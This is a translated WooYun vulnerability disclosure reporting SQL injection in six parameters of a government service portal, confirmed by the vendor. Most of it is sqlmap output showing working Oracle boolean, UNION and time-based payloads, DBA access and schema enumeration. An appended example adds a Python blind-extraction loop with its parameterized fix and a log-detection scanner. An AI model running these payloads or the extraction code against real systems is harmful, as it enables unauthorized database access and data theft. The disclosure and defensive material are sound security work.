WooYun vulnerability report

Vulnerability summary

Bug ID: wooyun-2015-0145934

Title: Multiple parameters on another port of a sensitive department's online service hall are SQL-injectable (DBA privileges + 27 databases + large amounts of data exposed), part 3

Vendor: 公安部一所 (First Research Institute of the Ministry of Public Security)

Author: 路人甲

Submitted: 2015-10-11 14:09

Fixed: 2015-11-28 11:36

Published: 2015-11-28 11:36

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: handed to the third-party partner organization (公安部一所) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2015-10-11: Details sent to the vendor; awaiting vendor handling
2015-10-14: Vendor confirmed; details visible to the vendor only
2015-10-24: Details opened to core white hats and domain experts
2015-11-03: Details opened to regular white hats
2015-11-13: Details opened to intern white hats
2015-11-28: Details opened to the public

Brief description:

Another port, with injectable parameters in several places, DBA privileges, 27 databases. Please mask the IP addresses, and if there is any other sensitive information, admins, please mask that too!
This time I tested six. Some of the parameters are the same as ones I submitted before, but in different places, and the injection types found also differ somewhat. I won't explain further; you know what I mean.

Detailed description:

Injection point 1:

**.**.**.**:8000/self/xzList.jsp?sid=4028811932a87caf0132a89ac07f0010


The sid parameter here is also injectable.

Place: GET
Parameter: sid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sid=4028811932a87caf0132a89ac07f0010' AND 5409=5409 AND 'CEQy'='CEQy
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: sid=4028811932a87caf0132a89ac07f0010' UNION ALL SELECT NULL,CHR(113)||CHR(105)||CHR(114)||CHR(120)||CHR(113)||CHR(113)||CHR(101)||CHR(73)||CHR(98)||CHR(97)||CHR(88)||CHR(86)||CHR(122)||CHR(110)||CHR(102)||CHR(113)||CHR(114)||CHR(120)||CHR(103)||CHR(113) FROM DUAL--
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: sid=4028811932a87caf0132a89ac07f0010' AND 1846=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(99)||CHR(81)||CHR(87),5) AND 'PObA'='PObA
---
[00:53:47] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[00:53:47] [INFO] fetching current user
current user: 'NOTA'
[00:53:47] [INFO] fetching current database
[00:53:47] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): 'NOTA'
[00:53:47] [INFO] testing if current user is DBA
current user is DBA: True


[screenshot 1.jpg]


database management system users [37]:
[*] ANONYMOUS
[*] BI
[*] CGS
[*] CTXSYS
[*] DBORACLE
[*] DBSNMP
[*] DIP
[*] DMSYS
[*] EXFSYS
[*] HR
[*] IX
[*] MDDATA
[*] MDSYS
[*] MGMT_VIEW
[*] NOTA
[*] NOTA_TEMP
[*] NOTADT
[*] OE
[*] OLAPSYS
[*] ORDPLUGINS
[*] ORDSYS
[*] OTATARGET
[*] OUTLN
[*] PM
[*] QS_ERP
[*] SCOTT
[*] SH
[*] SI_INFORMTN_SCHEMA
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WEBOTA
[*] WEBOTABASE
[*] WMSYS
[*] WSPCS
[*] XDB


available databases [27]:
[*] CGS
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] HR
[*] IX
[*] MDSYS
[*] NOTA
[*] NOTA_TEMP
[*] NOTADT
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WEBOTA
[*] WEBOTABASE
[*] WMSYS
[*] WSPCS
[*] XDB


Database: HR
+-------------+---------+
| Table       | Entries |
+-------------+---------+
| EMPLOYEES   | 107     |
| DEPARTMENTS | 27      |
| COUNTRIES   | 25      |
| LOCATIONS   | 23      |
| JOBS        | 19      |
| JOB_HISTORY | 10      |
| REGIONS     | 4       |
+-------------+---------+


[screenshots 2.jpg to 6.jpg]


There is a huge amount of data, so I'll stop here and test the parameters elsewhere.
Injection point 2:

**.**.**.**:8000/self/xz.jsp?sid=4028811932a87caf0132a89ac07f0010


The sid on this page is also injectable, with one fewer injection type than the one above.

GET parameter 'sid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection points with a total of 37 HTTP(s) requests:
---
Place: GET
Parameter: sid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sid=4028811932a87caf0132a89ac07f0010' AND 8445=8445 AND 'fwSz'='fwSz
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: sid=4028811932a87caf0132a89ac07f0010' AND 7617=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(68)||CHR(99)||CHR(120),5) AND 'DkvG'='DkvG
---
[01:10:34] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[01:10:34] [INFO] fetching current user
[01:10:34] [INFO] retrieving the length of query output
[01:10:34] [INFO] retrieved: 4
[01:10:36] [INFO] retrieved: NOTA
current user: 'NOTA'
[01:10:36] [INFO] fetching current database
[01:10:36] [INFO] retrieving the length of query output
[01:10:36] [INFO] resumed: 4
[01:10:36] [INFO] resumed: NOTA
[01:10:36] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): 'NOTA'
[01:10:36] [INFO] testing if current user is DBA
current user is DBA: True


[screenshot 7.jpg]


Injection point 3:

**.**.**.**:8000/self/projectinfo.jsp?sid=4028811932a87caf0132a89ac07f0010


The sid on this page is also injectable.

GET parameter 'sid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection points with a total of 23 HTTP(s) requests:
---
Place: GET
Parameter: sid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sid=4028811932a87caf0132a89ac07f0010' AND 2155=2155 AND 'aONo'='aONo
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: sid=4028811932a87caf0132a89ac07f0010' AND 2996=DBMS_PIPE.RECEIVE_MESSAGE(CHR(119)||CHR(117)||CHR(69)||CHR(80),5) AND 'RtFc'='RtFc
---
[01:12:56] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[01:12:56] [INFO] fetching current user
[01:12:56] [INFO] retrieving the length of query output
[01:12:56] [INFO] retrieved: 4
[01:12:59] [INFO] retrieved: NOTA
current user: 'NOTA'
[01:12:59] [INFO] fetching current database
[01:12:59] [INFO] retrieving the length of query output
[01:12:59] [INFO] resumed: 4
[01:12:59] [INFO] resumed: NOTA
[01:12:59] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): 'NOTA'
[01:12:59] [INFO] testing if current user is DBA
current user is DBA: True


[screenshot 8.jpg]


Injection point 4:

**.**.**.**:8000/self/addWssb.jsp?keyid=PJ201411141324100375


keyid is injectable.

GET parameter 'keyid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection points with a total of 29 HTTP(s) requests:
---
Place: GET
Parameter: keyid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: keyid=PJ201411141324100375' AND 7033=7033 AND 'fABa'='fABa
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: keyid=PJ201411141324100375' AND 7251=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(100)||CHR(77)||CHR(100),5) AND 'ydIE'='ydIE
---
[01:29:18] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[01:29:18] [INFO] fetching current user
[01:29:18] [INFO] retrieving the length of query output
[01:29:18] [INFO] retrieved: 4
[01:29:23] [INFO] retrieved: NOTA
current user: 'NOTA'
[01:29:23] [INFO] fetching current database
[01:29:23] [INFO] retrieving the length of query output
[01:29:23] [INFO] resumed: 4
[01:29:23] [INFO] resumed: NOTA
[01:29:23] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): 'NOTA'
[01:29:23] [INFO] testing if current user is DBA
current user is DBA: True


[screenshot 9.jpg]


Injection point 5:

**.**.**.**:8000/self/fckEditPage.jsp?docId=TB201112241456590953&mat=1


docId is blind-injectable.

sqlmap identified the following injection points with a total of 145 HTTP(s) requests:
---
Place: GET
Parameter: docId
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: docId=TB201112241456590953' AND 1377=1377 AND 'SVwx'='SVwx&mat=1
---
[01:43:55] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[01:43:55] [INFO] fetching current user
[01:43:55] [INFO] retrieving the length of query output
[01:43:55] [INFO] retrieved: 4
[01:44:07] [INFO] retrieved: NOTA
current user: 'NOTA'
[01:44:07] [INFO] fetching current database
[01:44:07] [INFO] retrieving the length of query output
[01:44:07] [INFO] resumed: 4
[01:44:07] [INFO] resumed: NOTA
[01:44:07] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): 'NOTA'
[01:44:07] [INFO] testing if current user is DBA
current user is DBA: True


[screenshot 10.jpg]


Injection point 6:

**.**.**.**:8000/list.jsp?flag=治安&tn=2&pn=3&xiangmu=1


flag is injectable, but the retrieved data came back wrong; a bypass would probably be needed, which I won't attempt. Or was it a problem with the database connection? After the test, visiting
**.**.**.**:8000/list.jsp?flag=禁毒
returns an error message that discloses the internal IP and the database address:

OTA DB init error: error establishing the database connection from the data source: Listener refused the connection with the following error: ORA-12519, TNS:no appropriate service handler found The Connection descriptor used by the client was: **.**.**.**:1521:orcl


sqlmap identified the following injection points with a total of 335 HTTP(s) requests:
---
Place: GET
Parameter: flag
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: flag=治安') AND 7500=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(112)||CHR(113)||CHR(74),5) AND ('DxMV'='DxMV&tn=2&pn=3&xiangmu=1
---
[01:53:51] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[01:53:51] [INFO] fetching current user
[01:53:51] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[01:53:51] [INFO] retrieved:
[01:53:51] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads
[01:53:51] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
current user: None
[01:53:51] [INFO] fetching current database
[01:53:51] [INFO] retrieved:
[01:53:52] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): None
[01:53:52] [INFO] testing if current user is DBA
current user is DBA: False


[screenshot 11.jpg]


That covers basically all the parameters on this port. If I have time I'll look for the rest, or see whether the parameters that appear non-injectable can be injected at a higher test level or with a bypass.
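What sqlmap is doing in the "retrieving the length of query output ... retrieved: 4 ... retrieved: NOTA" lines at injection points 2 to 5, shown as an added example (this is the editor's illustration, not code from the report or from the affected application): a boolean-based blind extraction loop run against a lookup that concatenates sid into its SQL text, which is the only way the `' AND 5409=5409 AND 'CEQy'='CEQy` payloads above could work, next to the bound-parameter form that closes the hole. sqlite3 stands in for the Oracle back end, so the Oracle expressions (SELECT USER FROM DUAL, ASCII, SUBSTR, LENGTH) are replaced by sqlite equivalents noted in the comments; the xz and dual_user tables, the single NOTA row and the function names are constructed for this example.

```python
"""Boolean-based blind extraction, and the parameterized query that stops it.

Added example (editor's illustration, not code from the report or from the
affected application). sqlite3 stands in for the Oracle back end; the table
xz, the dual_user table and the helper names are constructed for this example.
Oracle equivalents are noted where sqlite syntax differs.
"""
import sqlite3

SID = "4028811932a87caf0132a89ac07f0010"   # the sid value used in the report

DB = sqlite3.connect(":memory:")
DB.executescript("""
    CREATE TABLE xz (sid TEXT PRIMARY KEY, title TEXT);
    INSERT INTO xz VALUES ('4028811932a87caf0132a89ac07f0010', 'sample record');
    -- stand-in for Oracle's SELECT USER FROM DUAL, which returned NOTA above
    CREATE TABLE dual_user (username TEXT);
    INSERT INTO dual_user VALUES ('NOTA');
""")


def lookup_sid_vulnerable(sid: str) -> bool:
    """The pattern the payloads imply: sid is concatenated into the SQL text.
    Returns True when a row comes back, i.e. when the page would render the
    record. That True/False is the whole oracle a blind attack needs."""
    sql = "SELECT title FROM xz WHERE sid = '" + sid + "'"
    return DB.execute(sql).fetchone() is not None


def lookup_sid_safe(sid: str) -> bool:
    """Hardened form: the value is bound, so a quote inside it is only data."""
    row = DB.execute("SELECT title FROM xz WHERE sid = ?", (sid,)).fetchone()
    return row is not None


def blind_extract(oracle, base_sid: str = SID, max_len: int = 30):
    """Recover the DB user through a True/False oracle, the way sqlmap's
    boolean-based blind mode does: first the output length, then each
    character by binary search over printable ASCII.
    Returns (recovered_string, number_of_requests)."""
    queries = 0

    def ask(cond: str) -> bool:
        nonlocal queries
        queries += 1
        # Same shape as the report's payloads: <valid id>' AND <cond> AND 'a'='a
        return oracle(f"{base_sid}' AND ({cond}) AND 'a'='a")

    # Oracle: (SELECT USER FROM DUAL); sqlite stand-in below.
    user_expr = "(SELECT username FROM dual_user)"

    # Step 1: length of the output ("retrieving the length of query output").
    length = 0
    for n in range(1, max_len + 1):
        if ask(f"LENGTH({user_expr}) = {n}"):
            length = n
            break

    # Step 2: one character per position, about seven questions each.
    # Oracle: ASCII(SUBSTR(x, i, 1)) > mid; sqlite spells ASCII as UNICODE.
    out = ""
    for i in range(1, length + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if ask(f"UNICODE(SUBSTR({user_expr}, {i}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out, queries


if __name__ == "__main__":
    print(blind_extract(lookup_sid_vulnerable))   # recovers NOTA
    print(blind_extract(lookup_sid_safe))         # recovers nothing
```

Against the vulnerable lookup the loop recovers NOTA in about thirty requests (a length probe plus a binary search per character); against the bound-parameter version every probe is false and nothing comes back, which is the "filter" half of the remediation the report asks for. The DBA: True result is why the other half matters just as much: a schema user with DBA turns one injectable parameter into read access to every schema on the instance, and the user list above also shows Oracle's sample schemas (HR, OE, PM, SH, IX and the classic SCOTT) still present, which a hardened instance would have dropped.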

Proof of vulnerability:

[screenshots 2.jpg to 6.jpg, as above]

Remediation:

Filter input
Restrict privileges
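Until the code is fixed, the payload shapes in this report are easy to recognise in web-server access logs, and a detection rule is a practical stopgap alongside the two remediation points. The ORA-12519 "no appropriate service handler found" error at injection point 6 is what the Oracle listener returns when the instance has hit its process/session limit; a 335-request time-based run holding connections in 5-second DBMS_PIPE sleeps is one plausible way to get there (an inference, not something the report states), and it would also explain the empty `current user: None` result. Either way, the connection descriptor in that error (host:1521:orcl) is the kind of detail that a stack-trace-to-browser configuration leaks. The scanner below is an added example (the editor's illustration, not code from the report or the affected site); SAMPLE_LOG is constructed in Common Log Format from the paths in the report, with the payloads URL-encoded the way sqlmap sends them, and the client IPs and rule names are invented for the example.

```python
"""Spot the injection payload shapes from this report in access logs.

Added example (editor's illustration, not code from the report or the
affected site). SAMPLE_LOG is constructed: Common Log Format lines using the
paths from the report, with the payloads URL-encoded as sqlmap sends them;
the client IPs and the rule names are invented for this example.
"""
import re
from collections import Counter
from urllib.parse import unquote_plus

SAMPLE_LOG = """\
10.0.0.5 - - [11/Oct/2015:00:53:40 +0800] "GET /self/xzList.jsp?sid=4028811932a87caf0132a89ac07f0010 HTTP/1.1" 200 5123
10.0.0.5 - - [11/Oct/2015:00:53:47 +0800] "GET /self/xzList.jsp?sid=4028811932a87caf0132a89ac07f0010%27%20AND%205409%3D5409%20AND%20%27CEQy%27%3D%27CEQy HTTP/1.1" 200 5123
10.0.0.5 - - [11/Oct/2015:00:53:48 +0800] "GET /self/xzList.jsp?sid=4028811932a87caf0132a89ac07f0010%27%20UNION%20ALL%20SELECT%20NULL%2CCHR%28113%29%7C%7CCHR%28105%29%20FROM%20DUAL-- HTTP/1.1" 200 5301
10.0.0.5 - - [11/Oct/2015:01:53:51 +0800] "GET /list.jsp?flag=%E6%B2%BB%E5%AE%89%27%29%20AND%207500%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2899%29%2C5%29%20AND%20%28%27DxMV%27%3D%27DxMV&tn=2&pn=3&xiangmu=1 HTTP/1.1" 200 0
10.0.0.9 - - [11/Oct/2015:02:00:00 +0800] "GET /list.jsp?flag=%E7%A6%81%E6%AF%92&tn=2&pn=3&xiangmu=1 HTTP/1.1" 500 812
"""

# One line of Common Log Format; only the request target is inspected.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Each rule is a shape taken from the sqlmap payloads in the report. Rules run
# against the *decoded* target: matching the raw URL would miss %27 and %20.
RULES = {
    # Oracle time-based blind: DBMS_PIPE.RECEIVE_MESSAGE(<pipe>, <seconds>)
    "oracle_time_based": re.compile(r"DBMS_PIPE\.RECEIVE_MESSAGE\s*\(", re.I),
    # UNION-based extraction: ' UNION ALL SELECT NULL,... FROM DUAL--
    "union_select": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    # CHR(n)||CHR(n) chains: string literals built without quote characters
    "chr_concat_chain": re.compile(r"CHR\(\d+\)\s*\|\|\s*CHR\(\d+\)", re.I),
    # Boolean-based blind tautologies: AND 5409=5409 ... 'CEQy'='CEQy
    "boolean_tautology": re.compile(
        r"\b(?:AND|OR)\s+(?P<n>\d+)\s*=\s*(?P=n)\b|'(?P<s>\w*)'\s*=\s*'(?P=s)(?!\w)",
        re.I,
    ),
}


def decode_target(target: str, rounds: int = 3) -> str:
    """URL-decode until stable (bounded), so double-encoded payloads are seen too."""
    for _ in range(rounds):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return target


def scan_line(line: str):
    """Return an alert dict for a log line that matches any rule, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = decode_target(m["target"])
    hits = [name for name, rx in RULES.items() if rx.search(target)]
    if not hits:
        return None
    path, _, query = target.partition("?")
    return {
        "ip": m["ip"],
        "ts": m["ts"],
        "path": path,
        "status": int(m["status"]),
        "rules": hits,
        "query": query,
    }


def scan_log(text: str) -> list:
    """Scan a whole log; alerts are returned in file order."""
    return [a for a in (scan_line(line) for line in text.splitlines()) if a]


def alerts_per_ip(alerts: list) -> dict:
    """Aggregate by client: an automated run produces many alerts from one IP."""
    return dict(Counter(a["ip"] for a in alerts))


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for a in found:
        print(a["ip"], a["ts"], a["path"], ",".join(a["rules"]))
    print(alerts_per_ip(found))
```

The rules are deliberately narrow (Oracle-specific sleep primitive, UNION SELECT, CHR concatenation, numeric or quoted tautologies) so that ordinary Chinese parameter values such as flag=治安 decode cleanly and produce no alert, while each of the three sqlmap-shaped requests fires at least one rule. Aggregating by source IP is what turns individual hits into the picture the report itself paints: hundreds of requests from one client against a handful of .jsp pages.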

Copyright notice: when reposting, credit the source, 路人甲@乌云 (WooYun).


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability rank: 7

Confirmed: 2015-10-14 11:35

Vendor reply:

Thanks for the submission!
We verified and confirmed the described issue and have notified them to fix it.

Latest status:

None yet